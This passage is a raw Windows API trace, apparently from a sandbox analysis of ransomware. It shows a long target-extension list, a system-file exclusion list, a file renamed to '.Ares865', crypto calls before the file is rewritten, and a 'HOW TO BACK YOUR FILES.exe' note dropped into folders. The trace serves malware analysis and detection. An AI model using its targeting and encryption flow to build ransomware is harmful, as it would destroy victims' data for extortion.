lstrcmpiW (lpString1="wmv", lpString2="fp5") returned 1 [0040.183] lstrlenW (lpString="fp7") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fp7") returned 1 [0040.183] lstrlenW (lpString="fpt") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="fpt") returned 1 [0040.183] lstrlenW (lpString="frm") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="frm") returned 1 [0040.183] lstrlenW (lpString="gdb") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="gdb") returned 1 [0040.183] lstrlenW (lpString="gdb") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="gdb") returned 1 [0040.183] lstrlenW (lpString="grdb") returned 4 [0040.183] lstrcmpiW (lpString1=".wmv", lpString2="grdb") returned -1 [0040.183] lstrlenW (lpString="gwi") returned 3 [0040.183] lstrcmpiW (lpString1="wmv", lpString2="gwi") returned 1 [0040.183] lstrlenW (lpString="hdb") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="hdb") returned 1 [0040.184] lstrlenW (lpString="his") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="his") returned 1 [0040.184] lstrlenW (lpString="ib") returned 2 [0040.184] lstrcmpiW (lpString1="mv", lpString2="ib") returned 1 [0040.184] lstrlenW (lpString="idb") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="idb") returned 1 [0040.184] lstrlenW (lpString="ihx") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="ihx") returned 1 [0040.184] lstrlenW (lpString="itdb") returned 4 [0040.184] lstrcmpiW (lpString1=".wmv", lpString2="itdb") returned -1 [0040.184] lstrlenW (lpString="itw") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="itw") returned 1 [0040.184] lstrlenW (lpString="jet") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="jet") returned 1 [0040.184] lstrlenW (lpString="jtx") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="jtx") returned 1 [0040.184] lstrlenW (lpString="kdb") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="kdb") returned 1 [0040.184] lstrlenW (lpString="kexi") returned 4 [0040.184] lstrcmpiW (lpString1=".wmv", lpString2="kexi") returned -1 [0040.184] lstrlenW (lpString="kexic") returned 5 [0040.184] lstrcmpiW (lpString1="e.wmv", lpString2="kexic") returned -1 [0040.184] lstrlenW (lpString="kexis") returned 5 [0040.184] lstrcmpiW (lpString1="e.wmv", lpString2="kexis") returned -1 [0040.184] lstrlenW (lpString="lgc") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="lgc") returned 1 [0040.184] lstrlenW (lpString="lwx") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="lwx") returned 1 [0040.184] lstrlenW (lpString="maf") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="maf") returned 1 [0040.184] lstrlenW (lpString="maq") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="maq") returned 1 [0040.184] lstrlenW (lpString="mar") returned 3 [0040.184] lstrcmpiW (lpString1="wmv", lpString2="mar") returned 1 [0040.184] lstrlenW (lpString="marshal") returned 7 [0040.184] lstrcmpiW (lpString1="ife.wmv", lpString2="marshal") returned -1 [0040.185] lstrlenW (lpString="mas") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mas") returned 1 [0040.185] lstrlenW (lpString="mav") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mav") returned 1 [0040.185] lstrlenW (lpString="maw") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="maw") returned 1 [0040.185] lstrlenW (lpString="mdbhtml") returned 7 [0040.185] lstrcmpiW (lpString1="ife.wmv", lpString2="mdbhtml") returned -1 [0040.185] lstrlenW (lpString="mdn") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mdn") returned 1 [0040.185] lstrlenW (lpString="mdt") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mdt") returned 1 [0040.185] lstrlenW (lpString="mfd") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mfd") returned 1 [0040.185] lstrlenW (lpString="mpd") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mpd") returned 1 [0040.185] lstrlenW (lpString="mrg") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mrg") returned 1 [0040.185] lstrlenW (lpString="mud") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mud") returned 1 [0040.185] lstrlenW (lpString="mwb") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="mwb") returned 1 [0040.185] lstrlenW (lpString="myd") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="myd") returned 1 [0040.185] lstrlenW (lpString="ndf") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="ndf") returned 1 [0040.185] lstrlenW (lpString="nnt") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="nnt") returned 1 [0040.185] lstrlenW (lpString="nrmlib") returned 6 [0040.185] lstrcmpiW (lpString1="fe.wmv", lpString2="nrmlib") returned -1 [0040.185] lstrlenW (lpString="ns2") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="ns2") returned 1 [0040.185] lstrlenW (lpString="ns3") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="ns3") returned 1 [0040.185] lstrlenW (lpString="ns4") returned 3 [0040.185] lstrcmpiW (lpString1="wmv", lpString2="ns4") returned 1 [0040.186] lstrlenW (lpString="nsf") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="nsf") returned 1 [0040.186] lstrlenW (lpString="nv") returned 2 [0040.186] lstrcmpiW (lpString1="mv", lpString2="nv") returned -1 [0040.186] lstrlenW (lpString="nv2") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="nv2") returned 1 [0040.186] lstrlenW (lpString="nwdb") returned 4 [0040.186] lstrcmpiW (lpString1=".wmv", lpString2="nwdb") returned -1 [0040.186] lstrlenW (lpString="nyf") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="nyf") returned 1 [0040.186] lstrlenW (lpString="odb") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="odb") returned 1 [0040.186] lstrlenW (lpString="odb") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="odb") returned 1 [0040.186] lstrlenW (lpString="oqy") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="oqy") returned 1 [0040.186] lstrlenW (lpString="ora") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="ora") returned 1 [0040.186] lstrlenW (lpString="orx") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="orx") returned 1 [0040.186] lstrlenW (lpString="owc") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="owc") returned 1 [0040.186] lstrlenW (lpString="p96") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="p96") returned 1 [0040.186] lstrlenW (lpString="p97") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="p97") returned 1 [0040.186] lstrlenW (lpString="pan") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="pan") returned 1 [0040.186] lstrlenW (lpString="pdb") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="pdb") returned 1 [0040.186] lstrlenW (lpString="pdm") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="pdm") returned 1 [0040.186] lstrlenW (lpString="pnz") returned 3 [0040.186] lstrcmpiW (lpString1="wmv", lpString2="pnz") returned 1 [0040.187] lstrlenW (lpString="qry") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="qry") returned 1 [0040.187] lstrlenW (lpString="qvd") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="qvd") returned 1 [0040.187] lstrlenW (lpString="rbf") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="rbf") returned 1 [0040.187] lstrlenW (lpString="rctd") returned 4 [0040.187] lstrcmpiW (lpString1=".wmv", lpString2="rctd") returned -1 [0040.187] lstrlenW (lpString="rod") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="rod") returned 1 [0040.187] lstrlenW (lpString="rodx") returned 4 [0040.187] lstrcmpiW (lpString1=".wmv", lpString2="rodx") returned -1 [0040.187] lstrlenW (lpString="rpd") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="rpd") returned 1 [0040.187] lstrlenW (lpString="rsd") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="rsd") returned 1 [0040.187] lstrlenW (lpString="sas7bdat") returned 8 [0040.187] lstrcmpiW (lpString1="life.wmv", lpString2="sas7bdat") returned -1 [0040.187] lstrlenW (lpString="sbf") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="sbf") returned 1 [0040.187] lstrlenW (lpString="scx") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="scx") returned 1 [0040.187] lstrlenW (lpString="sdb") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="sdb") returned 1 [0040.187] lstrlenW (lpString="sdc") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="sdc") returned 1 [0040.187] lstrlenW (lpString="sdf") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="sdf") returned 1 [0040.187] lstrlenW (lpString="sis") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="sis") returned 1 [0040.187] lstrlenW (lpString="spq") returned 3 [0040.187] lstrcmpiW (lpString1="wmv", lpString2="spq") returned 1 [0040.187] lstrlenW (lpString="te") returned 2 [0040.187] lstrcmpiW (lpString1="mv", lpString2="te") returned -1 [0040.187] lstrlenW (lpString="teacher") returned 7 [0040.188] lstrcmpiW (lpString1="ife.wmv", lpString2="teacher") returned -1 [0040.188] lstrlenW (lpString="tmd") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="tmd") returned 1 [0040.188] lstrlenW (lpString="tps") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="tps") returned 1 [0040.188] lstrlenW (lpString="trc") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="trc") returned 1 [0040.188] lstrlenW (lpString="trc") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="trc") returned 1 [0040.188] lstrlenW (lpString="trm") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="trm") returned 1 [0040.188] lstrlenW (lpString="udb") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="udb") returned 1 [0040.188] lstrlenW (lpString="udl") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="udl") returned 1 [0040.188] lstrlenW (lpString="usr") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="usr") returned 1 [0040.188] lstrlenW (lpString="v12") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="v12") returned 1 [0040.188] lstrlenW (lpString="vis") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="vis") returned 1 [0040.188] lstrlenW (lpString="vpd") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="vpd") returned 1 [0040.188] lstrlenW (lpString="vvv") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="vvv") returned 1 [0040.188] lstrlenW (lpString="wdb") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="wdb") returned 1 [0040.188] lstrlenW (lpString="wmdb") returned 4 [0040.188] lstrcmpiW (lpString1=".wmv", lpString2="wmdb") returned -1 [0040.188] lstrlenW (lpString="wrk") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="wrk") returned -1 [0040.188] lstrlenW (lpString="xdb") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="xdb") returned -1 [0040.188] lstrlenW (lpString="xld") returned 3 [0040.188] lstrcmpiW (lpString1="wmv", lpString2="xld") returned -1 [0040.188] lstrlenW (lpString="xmlff") returned 5 [0040.188] lstrcmpiW (lpString1="e.wmv", lpString2="xmlff") returned -1 [0040.188] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.Ares865") returned 57 [0040.189] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.Ares865" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.ares865"), dwFlags=0x1) returned 1 [0040.192] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.Ares865" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0040.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26246026) returned 1 [0040.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0040.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0040.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0040.192] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0040.467] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0040.467] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0040.467] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1907e90, lpName=0x0) returned 0x12c [0040.469] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1800000, dwNumberOfBytesToMap=0x107e90) returned 0x1120000 [0040.950] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0040.974] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0040.984] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0040.985] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0040.987] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0040.988] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0040.988] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb400 [0040.989] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0040.989] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0040.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0040.990] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0040.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0040.994] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0040.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0040.995] UnmapViewOfFile (lpBaseAddress=0x1120000) returned 1 [0041.022] CloseHandle (hObject=0x12c) returned 1 [0041.022] CloseHandle (hObject=0x118) returned 1 [0041.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0041.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0041.739] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0041.739] FindClose (in: hFindFile=0x2cd0a8 | out: hFindFile=0x2cd0a8) returned 1 [0041.739] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c90 [0041.739] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Recorded TV", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0041.739] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccea8 | out: hHeap=0x2b0000) returned 1 [0041.739] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0041.739] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV") returned 27 [0041.739] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Recorded TV" | out: lpString1="C:\\Users\\Public\\Recorded TV") returned="C:\\Users\\Public\\Recorded TV" [0041.739] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.739] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\recorded tv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0041.740] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0041.740] GetLastError () returned 0x0 [0041.740] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0041.740] ReadFile (in: hFile=0x120, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0041.740] CloseHandle (hObject=0x120) returned 1 [0041.740] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0041.740] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.740] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0041.740] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.740] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.740] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.741] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.741] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.741] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.741] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.741] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.741] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x89e5e11e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x89e5e11e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.741] lstrlenW (lpString="desktop.ini") returned 11 [0041.741] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\*") returned 29 [0041.741] lstrcpyW (in: lpString1=0x2cce438, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.741] lstrlenW (lpString="desktop.ini") returned 11 [0041.741] lstrlenW (lpString="Ares865") returned 7 [0041.741] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.741] lstrlenW (lpString=".dll") returned 4 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.741] lstrlenW (lpString=".lnk") returned 4 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.741] lstrlenW (lpString=".ini") returned 4 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.741] lstrlenW (lpString=".sys") returned 4 [0041.741] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.741] lstrlenW (lpString="desktop.ini") returned 11 [0041.742] lstrlenW (lpString="bak") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0041.742] lstrlenW (lpString="ba_") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0041.742] lstrlenW (lpString="dbb") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0041.742] lstrlenW (lpString="vmdk") returned 4 [0041.742] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0041.742] lstrlenW (lpString="rar") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0041.742] lstrlenW (lpString="zip") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0041.742] lstrlenW (lpString="tgz") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0041.742] lstrlenW (lpString="vbox") returned 4 [0041.742] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0041.742] lstrlenW (lpString="vdi") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0041.742] lstrlenW (lpString="vhd") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0041.742] lstrlenW (lpString="vhdx") returned 4 [0041.742] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0041.742] lstrlenW (lpString="avhd") returned 4 [0041.742] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0041.742] lstrlenW (lpString="db") returned 2 [0041.742] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0041.742] lstrlenW (lpString="db2") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0041.742] lstrlenW (lpString="db3") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0041.742] lstrlenW (lpString="dbf") returned 3 [0041.742] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0041.743] lstrlenW (lpString="mdf") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0041.743] lstrlenW (lpString="mdb") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0041.743] lstrlenW (lpString="sql") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0041.743] lstrlenW (lpString="sqlite") returned 6 [0041.743] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0041.743] lstrlenW (lpString="sqlite3") returned 7 [0041.743] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0041.743] lstrlenW (lpString="sqlitedb") returned 8 [0041.743] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0041.743] lstrlenW (lpString="xml") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0041.743] lstrlenW (lpString="$er") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0041.743] lstrlenW (lpString="4dd") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0041.743] lstrlenW (lpString="4dl") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0041.743] lstrlenW (lpString="^^^") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0041.743] lstrlenW (lpString="abs") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0041.743] lstrlenW (lpString="abx") returned 3 [0041.743] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0041.743] lstrlenW (lpString="accdb") returned 5 [0041.743] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0041.743] lstrlenW (lpString="accdc") returned 5 [0041.743] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0041.743] lstrlenW (lpString="accde") returned 5 [0041.743] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0041.743] lstrlenW (lpString="accdr") returned 5 [0041.743] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0041.743] lstrlenW (lpString="accdt") returned 5 [0041.743] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0041.744] lstrlenW (lpString="accdw") returned 5 [0041.744] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0041.744] lstrlenW (lpString="accft") returned 5 [0041.744] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0041.744] lstrlenW (lpString="adb") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.744] lstrlenW (lpString="adb") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0041.744] lstrlenW (lpString="ade") returned 3 [0041.744] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0041.744] lstrlenW 